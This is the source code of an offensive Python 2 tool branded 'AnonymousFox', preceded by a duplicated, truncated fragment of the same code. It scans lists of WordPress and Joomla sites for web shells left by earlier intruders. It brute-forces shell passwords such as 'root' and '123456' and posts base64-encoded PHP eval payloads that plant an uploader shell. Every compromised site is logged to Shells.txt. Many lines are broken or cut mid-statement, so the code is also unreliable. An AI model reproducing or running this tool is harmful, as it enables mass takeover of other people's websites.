print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis ='.phtml',data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
elif 'Index of' in SH24_check and '.php' in SH24_check :
shells = []
if re.findall(pattern_php,SH24_check):
shells = re.findall(pattern_php,SH24_check)
for shell in shells:
sh_check = requests.get(SH24+shell+'.php',timeout=15).content
if ' type="file"' in sh_check or ' type=\'file\'' in sh_check or ' type= "file"' in sh_check or ' type= \'file\'' in sh_check or ' type = "file"' in sh_check or ' type = \'file\'' in sh_check or ' type ="file"' in sh_check or ' type =\'file\'' in sh_check or ' type=file' in sh_check or ' type =file' in sh_check or ' type= file' in sh_check or ' type = file' in sh_check or 'Upload</a> ]</li><li>[' in sh_check or 'upload</a><li><a>Sym' in sh_check :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in sh_check :
nhzgrf ='.php',data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot ='.php',data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t ='.php',data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin ='.php',data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r ='.php',data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 ='.php',data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 ='.php',data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 ='.php',data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 ='.php',data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 ='.php',data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 ='.php',data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 ='.php',data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 ='.php',data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis ='.php',data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
elif 'Index of' in SH24_check and '.phtml' in SH24_check :
shells = []
if re.findall(pattern_phtml,SH24_check):
shells = re.findall(pattern_phtml,SH24_check)
for shell in shells:
sh_check = requests.get(SH24+shell+'.phtml',timeout=15).content
if ' type="file"' in sh_check or ' type=\'file\'' in sh_check or ' type= "file"' in sh_check or ' type= \'file\'' in sh_check or ' type = "file"' in sh_check or ' type = \'file\'' in sh_check or ' type ="file"' in sh_check or ' type =\'file\'' in sh_check or ' type=file' in sh_check or ' type =file' in sh_check or ' type= file' in sh_check or ' type = file' in sh_check or 'Upload</a> ]</li><li>[' in sh_check or 'upload</a><li><a>Sym' in sh_check :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in sh_check :
nhzgrf ='.phtml',data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot ='.phtml',data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t ='.phtml',data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin ='.phtml',data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r ='.phtml',data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 ='.phtml',data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 ='.phtml',data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 ='.phtml',data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 ='.phtml',data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 ='.phtml',data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 ='.phtml',data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 ='.phtml',data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 ='.phtml',data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis ='.phtml',data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
elif ' type="file"' in site_check or ' type=\'file\'' in site_check or ' type= "file"' in site_check or ' type= \'file\'' in site_check or ' type = "file"' in site_check or ' type = \'file\'' in site_check or ' type ="file"' in site_check or ' type =\'file\'' in site_check or ' type=file' in site_check or ' type =file' in site_check or ' type= file' in site_check or ' type = file' in site_check :
print ' -| '+site +'/ --> {}[Succeeded]'.format(fg)
with open('mylogin.txt', mode='a') as ccc:
ccc.write(site+'/ [Register or Contact]
elif ' type="file"' in up_check or ' type=\'file\'' in up_check or ' type= "file"' in up_check or ' type= \'file\'' in up_check or ' type = "file"' in up_check or ' type = \'file\'' in up_check or ' type ="file"' in up_check or ' type =\'file\'' in up_check or ' type=file' in up_check or ' type =file' in up_check or ' type= file' in up_check or ' type = file' in up_check or 'Upload</a> ]</li><li>[' in up_check or 'upload</a><li><a>Sym' in up_check :
print ' -| '+site +'/ --> {}[Succeeded]'.format(fg)
with open('UPloaders.txt', mode='a') as cc:
cc.write(SH20+' [Hacked]
elif ' type="file"' in upload_check or ' type=\'file\'' in upload_check or ' type= "file"' in upload_check or ' type= \'file\'' in upload_check or ' type = "file"' in upload_check or ' type = \'file\'' in upload_check or ' type ="file"' in upload_check or ' type =\'file\'' in upload_check or ' type=file' in upload_check or ' type =file' in upload_check or ' type= file' in upload_check or ' type = file' in upload_check or 'Upload</a> ]</li><li>[' in upload_check or 'upload</a><li><a>Sym' in upload_check :
print ' -| '+site +'/ --> {}[Succeeded]'.format(fg)
with open('UPloaders.txt', mode='a') as cc:
cc.write(SH21+' [Hacked]
elif ' type="file"' in shell_check or ' type=\'file\'' in shell_check or ' type= "file"' in shell_check or ' type= \'file\'' in shell_check or ' type = "file"' in shell_check or ' type = \'file\'' in shell_check or ' type ="file"' in shell_check or ' type =\'file\'' in shell_check or ' type=file' in shell_check or ' type =file' in shell_check or ' type= file' in shell_check or ' type = file' in shell_check or 'Upload</a> ]</li><li>[' in shell_check or 'upload</a><li><a>Sym' in shell_check :
print ' -| '+site +'/ --> {}[Succeeded]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
except :
print ' -| '+site +' --> {}[Failed]'.format(fr)
def WordPress(site) :
def Joomla(site) :
def All(site) :
if w == 1 :
mp = Pool(100), target)
elif w == 2 :
mp = Pool(100), target)
elif w == 3 :
mp = Pool(100), target)
elif w == 4 :
mp = Pool(100), target)
else :
print " Go to hell :P "
Did this file decode correctly?
Original Code
import sys
import requests , re , datetime
from multiprocessing.dummy import Pool
from colorama import Fore
from colorama import Style
from pprint import pprint
from colorama import init
fr = Fore.RED
fc = Fore.CYAN
fw = Fore.WHITE
fg = Fore.GREEN
sd = Style.DIM
sn = Style.NORMAL
sb = Style.BRIGHT
print """
{}[#]{} Create By ::
{} ___ ______
{} / _ \ | ___|
{}/ /_\ \_ __ ___ _ __ _ _ _ __ ___ ___ _ _ ___ | |_ _____ __
{}| _ | '_ \ / _ \| '_ \| | | | '_ ` _ \ / _ \| | | / __|| _/ _ \ \/ /
{}| | | | | | | (_) | | | | |_| | | | | | | (_) | |_| \__ \| || (_) > <
{}\_| |_/_| |_|\___/|_| |_|\__, |_| |_| |_|\___/ \__,_|___/\_| \___/_/\_\
{} __/ |
{} |___/ {} Fox RSF {}[Priv8]
""".format(fr, fw, fg, fr, fg, fr, fg, fr, fg, fr, fw, fg, fr, fg)
target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()]
except IndexError:
path = str(sys.argv[0]).split('\\')
exit('\n [!] Enter <'+path[len(path)-1] + '> <sites.txt>')
print ' {}[1] WordPress'.format(fg)
print ' {}[2] Joomla'.format(fg)
print ' {}[3] Other'.format(fg)
print ' [4] WordPress & Joomla & Other{} => {}(This option is not recommended if the list is large)'.format(fg,fr)
print " {}[0] Exit".format(fr)
w = int(raw_input('\n --> : '))
print ''
def URL(url):
if url[-1] == "/":
pattern = re.compile('(.*)/')
site = re.findall(pattern,url)
url = site[0]
if url[:7] != "http://" and url[:8] != "https://":
url = "http://" + url
return url
def WordPress1(site):
site = URL(site)
SH1 = site+'/wp-content/plugins/upspy/index.php'
SH2 = site+'/wp-content/plugins/ubh/index.php'
SH3 = site+'/wp-content/plugins/vwcleanerplugin/bump.php?cache'
SH4 = site+'/wp-content/themes/gaukingo/db.php'
SH5 = site+'/wp-content/plugins/three-column-screen-layout/db.php'
SH6 = site+'/wp-content/plugins/xichang/x.php?xi'
SH7 = site+'/wp-content/plugins/html404/index.html'
SH8 = site+'/wp-content/plugins/wp-db-ajax-made/wp-ajax.php'
SH9 = site+'/wp-admin/shapes.php'
SH10 = site+'/XxX.php'
SH11 = site+'/Marvins.php'
SH12 = site+'/wp-includes/css/modules.php'
SH13 = site+'/olux.php'
SH15 = site+'/indoxploit.php'
SH19 = site+'/wso.php'
SH20 = site+'/wp-content/plugins/css-ready-sel/file.php'
SH21 = site+'/wp-content/plugins/css-ready/file.php'
SH22 = site+'/wp-content/think.php'
try :
modules_check = requests.get(SH12,timeout=15).content
wso_check = requests.get(SH19,timeout=15).content
except :
password_nhzgrf = {'pass':'nhzgrf'}
password_root = {'pass':'root'}
password_r00t = {'pass':'r00t'}
password_admin = {'pass':'admin'}
password_t00r = {'pass':'t00r'}
password_123 = {'pass':'123'}
password_1234 = {'pass':'1234'}
password_12345 = {'pass':'12345'}
password_123456 = {'pass':'123456'}
password_123123 = {'pass':'123123'}
password_123321 = {'pass':'123321'}
password_123456789 = {'pass':'123456789'}
password_1234567890 = {'pass':'1234567890'}
password_haurgeulis = {'pass':'haurgeulis'}
password_rehan = {'password':'rehan'}
#modules_upload2 = {'itongtong':'eval(base64_decode("JGZvPWZvcGVuKCJGMHgucGhwIiwidyIpOwpmd3JpdGUoJGZvLGJhc2U2NF9kZWNvZGUoJ1BEOXdhSEFOQ21WamFHOGdJa2hoWTJ0bFpDQkNlU0JCYm05dWVXMXZkWE5HYjNoY2JpSTdEUXA3RFFva2MyRjNNU0E5SUNSZlJrbE1SVk5iSjJacGJHVW5YVnNuZEcxd1gyNWhiV1VuWFRzTkNpUnpZWGN5SUQwZ0pGOUdTVXhGVTFzblptbHNaU2RkV3lkdVlXMWxKMTA3RFFwbFkyaHZJQ0k4Wm05eWJTQnRaWFJvYjJROUoxQlBVMVFuSUdWdVkzUjVjR1U5SjIxMWJIUnBjR0Z5ZEM5bWIzSnRMV1JoZEdFblBnMEtQR2x1Y0hWMElIUjVjR1U5SjJacGJHVW5ibUZ0WlQwblptbHNaU2NnTHo0TkNqeHBibkIxZENCMGVYQmxQU2R6ZFdKdGFYUW5JSFpoYkhWbFBTZDFjR3h2WVdRZ2MyaGxiR3duSUM4K0RRbzhMMlp2Y20wK0lqc05DbTF2ZG1WZmRYQnNiMkZrWldSZlptbHNaU2drYzJGM01Td2tjMkYzTWlrN0RRcDlEUW8vUGc9PScpKTs="));'}
#modules_upload3 = {'itongtong':'eval(base64_decode("JGZvPWZvcGVuKCRfU0VSVkVSWyJET0NVTUVOVF9ST09UIl0uIi93cC1jb250ZW50L3VwbG9hZHMvRjB4LnBocCIsInciKTsKZndyaXRlKCRmbyxiYXNlNjRfZGVjb2RlKCdQRDl3YUhBTkNtVmphRzhnSWtoaFkydGxaQ0JDZVNCQmJtOXVlVzF2ZFhOR2IzaGNiaUk3RFFwN0RRb2tjMkYzTVNBOUlDUmZSa2xNUlZOYkoyWnBiR1VuWFZzbmRHMXdYMjVoYldVblhUc05DaVJ6WVhjeUlEMGdKRjlHU1V4RlUxc25abWxzWlNkZFd5ZHVZVzFsSjEwN0RRcGxZMmh2SUNJOFptOXliU0J0WlhSb2IyUTlKMUJQVTFRbklHVnVZM1I1Y0dVOUoyMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRW5QZzBLUEdsdWNIVjBJSFI1Y0dVOUoyWnBiR1VuYm1GdFpUMG5abWxzWlNjZ0x6NE5DanhwYm5CMWRDQjBlWEJsUFNkemRXSnRhWFFuSUhaaGJIVmxQU2QxY0d4dllXUWdjMmhsYkd3bklDOCtEUW84TDJadmNtMCtJanNOQ20xdmRtVmZkWEJzYjJGa1pXUmZabWxzWlNna2MyRjNNU3drYzJGM01pazdEUXA5RFFvL1BnPT0nKSk7"));'}
if 'United Tunsian Scammers' in requests.get(SH1,timeout=15).content :
conspy = requests.get(site+'/wp-content/plugins/upspy/con.php',timeout=15).content
upspy = requests.get(site+'/wp-content/plugins/upspy/up.php',timeout=15).content
wsospy = requests.get(site+'/wp-content/plugins/upspy/sllolx.php',timeout=15).content
if 'Web Console' in conspy :
print ' -| '+site +'/ --> {}[UPspy]'.format(fg)
if '' in upspy :
if 'WSO 2.6' in wsospy :
with open('Shells.txt', mode='a') as d:
d.write(site+'/wp-content/plugins/upspy/con.php#ubh@ubh | '+site+'/wp-content/plugins/upspy/up.php | '+site+'/wp-content/plugins/upspy/sllolx.php\n')
else :
with open('Shells.txt', mode='a') as d:
d.write(site+'/wp-content/plugins/upspy/con.php#ubh@ubh | '+site+'/wp-content/plugins/upspy/up.php\n')
else :
if 'WSO 2.6' in wsospy :
with open('Shells.txt', mode='a') as d:
d.write(site+'/wp-content/plugins/upspy/con.php#ubh@ubh | '+site+'/wp-content/plugins/upspy/sllolx.php\n')
else :
with open('Shells.txt', mode='a') as d:
elif '' in upspy :
print ' -| '+site +'/ --> {}[UPspy]'.format(fg)
if 'WSO 2.6' in wsospy :
with open('Shells.txt', mode='a') as d:
d.write(site+'/wp-content/plugins/upspy/up.php | '+site+'/wp-content/plugins/upspy/sllolx.php\n')
else :
with open('Shells.txt', mode='a') as d:
elif 'WSO 2.6' in wsospy :
print ' -| '+site +'/ --> {}[UPspy]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
elif 'United Bangladeshi Hackers' in requests.get(SH2,timeout=15).content :
conubh = requests.get(site+'/wp-content/plugins/ubh/con.php',timeout=15).content
upubh = requests.get(site+'/wp-content/plugins/ubh/up.php',timeout=15).content
if 'Web Console' in conubh :
print ' -| '+site +'/ --> {}[UBH]'.format(fg)
if '' in upubh :
with open('Shells.txt', mode='a') as d:
d.write(site+'/wp-content/plugins/ubh/con.php#ubh@ubh | '+site+'/wp-content/plugins/ubh/up.php\n')
else :
with open('Shells.txt', mode='a') as d:
elif '' in upubh :
print ' -| '+site +'/ --> {}[UBH]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
elif '[UNAME]:' in requests.get(SH3,timeout=15).content :
print ' -| '+site +'/ --> {}[VWCleaner]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'xichang1' in requests.get(SH6,timeout=15).content :
print ' -| '+site +'/ --> {}[xichang]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'Hckd By? Html404' in requests.get(SH7,timeout=15).content :
xccc = requests.get(site+'/wp-content/plugins/html404/xccc.php',timeout=15).content
cry = requests.get(site+'/wp-content/plugins/html404/cry.php.pjpeg',timeout=15).content
wso25 = requests.get(site+'/wp-content/plugins/html404/wso25.php',timeout=15).content
if 'Html404' in xccc :
print ' -| '+site +'/ --> {}[Html404]'.format(fg)
if 'JEMBOETS' in cry :
if 'WSO 2.5' in wso25 :
with open('Shells.txt', mode='a') as d:
d.write(site+'/wp-content/plugins/html404/xccc.php | '+site+'/wp-content/plugins/html404/cry.php.pjpeg | '+site+'/wp-content/plugins/html404/wso25.php\n')
else :
with open('Shells.txt', mode='a') as d:
d.write(site+'/wp-content/plugins/html404/xccc.php | '+site+'/wp-content/plugins/html404/cry.php.pjpeg\n')
else :
if 'WSO 2.5' in wso25 :
with open('Shells.txt', mode='a') as d:
d.write(site+'/wp-content/plugins/html404/xccc.php | '+site+'/wp-content/plugins/html404/wso25.php\n')
else :
with open('Shells.txt', mode='a') as d:
elif 'JEMBOETS' in cry :
print ' -| '+site +'/ --> {}[Html404]'.format(fg)
if 'WSO 2.5' in wso25 :
with open('Shells.txt', mode='a') as d:
d.write(site+'/wp-content/plugins/html404/cry.php.pjpeg | '+site+'/wp-content/plugins/html404/wso25.php\n')
else :
with open('Shells.txt', mode='a') as d:
elif 'WSO 2.5' in wso25 :
print ' -| '+site +'/ --> {}[Html404]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
elif '<title>Mister Spy</title>' in requests.get(SH9,timeout=15).content :
print ' -| '+site +'/ --> {}[MisterSpy]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'WSO 2.6' in requests.get(SH13,timeout=15).content :
print ' -| '+site +'/ --> {}[Olux]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif '<title>IndoXploit</title>' in requests.get(SH15,timeout=15).content :
print ' -| '+site +'/ --> {}[IndoXploit]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif '#p@@#' in requests.get(SH25,timeout=15).content :
print ' -| '+site +'/ --> {}[License]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif '<' not in modules_check and '/wp-includes/css' in modules_check :
upShell =,data=modules_upload,timeout=15)
check = requests.get(site+'/F0x.php',timeout=15).content
if 'AnonymousFox' in check :
print ' -| '+site +'/ --> {}[ChinafansModules]'.format(fg)
with open('Shells.txt', mode='a') as d:
d.write(SH12+'#itongtong [POST] | {}/F0x.php [Succeeded]\n'.format(site))
else :
upShell =,data=modules_upload2,timeout=15)
check = requests.get(site+'/wp-includes/css/F0x.php',timeout=15).content
if 'AnonymousFox' in check :
print ' -| '+site +'/ --> {}[ChinafansModules]'.format(fg)
with open('Shells.txt', mode='a') as d:
d.write(SH12+'#itongtong [POST] | {}/wp-includes/css/F0x.php [Succeeded]\n'.format(site))
else :
upShell =,data=modules_upload3,timeout=15)
check = requests.get(site+'/wp-content/uploads/F0x.php',timeout=15).content
if 'AnonymousFox' in check :
print ' -| '+site +'/ --> {}[ChinafansModules]'.format(fg)
with open('Shells.txt', mode='a') as d:
d.write(SH12+'#itongtong [POST] | {}/wp-content/uploads/F0x.php [Succeeded]\n'.format(site))
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
elif ' name=pass' in requests.get(SH4,timeout=15).content :
nhzgrf =,data=password_nhzgrf,timeout=15).content
